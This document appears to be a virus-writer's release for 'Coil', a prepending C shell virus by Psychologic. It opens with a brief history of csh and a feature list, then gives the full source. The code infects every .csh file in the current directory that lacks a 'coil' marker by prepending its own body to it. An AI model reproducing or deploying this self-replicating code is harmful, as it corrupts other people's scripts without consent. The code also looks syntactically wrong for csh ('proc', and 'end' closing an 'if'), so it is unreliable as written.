COIL/Psychologic

The C shell (csh or the improved version, tcsh, on most machines) is a Unix shell that was created
by Bill Joy while a graduate student at University of California, Berkeley in the late 1970s. It has
been distributed widely, beginning with the 2BSD release of the BSD Unix system that Joy began 
distributing in 1978. Other early contributors to the ideas or the code were Michael Ubell, 
Eric Allman, Mike O'Brien and Jim Kulp.

Coil is a simple Proof Of Concept Cshell virus that I made in less than one hour :

- Direct action Prpending Cshell virus
- multi platform under *nix & windows
- Use I/O (stdout) redirection in concate strings, because awk won't work in windows
- Infect csh files on current directory
- No epo
- No poly
- No encrypt
- Very simple ;)

I also attach my short article about cshell
-----------------------------------------------------------------------------------------code cut
#!/bin/csh

proc coil()
        foreach file ($cwd/*.csh)
                set mark = ("`grep -c 'coil' $file`")
                if ($mark=='0') then
			cat $file>temp
                        cat $0>$file
			cat temp>>$file
                end
        end
rm temp
end
echo Just another proof of concept virus by Psychologic/3F
coil